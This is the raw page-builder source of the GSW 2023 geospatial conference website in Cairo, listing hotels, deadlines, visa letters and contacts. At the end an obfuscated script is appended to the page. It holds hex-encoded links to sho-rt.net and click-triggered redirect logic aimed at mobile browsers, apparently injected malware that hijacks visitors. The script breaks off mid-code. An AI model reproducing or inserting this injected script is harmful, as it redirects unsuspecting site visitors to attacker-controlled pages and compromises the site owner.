author has the opportunity to publish his/her articles in one of the following journals :</h3>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\n<h3></h3>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is September 1, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692140427657{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Crystal Cruising Restaurant</strong></h5>\n<p><img class=\"wp-image-5195 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d2-1-300x300.jpg\" alt=\"\" width=\"198\" height=\"198\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on The Citadel of Cairo</h5>\n<p><img class=\"wp-image-5196 size-medium aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d1-1-300x201.jpg\" alt=\"\" width=\"300\" height=\"201\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const 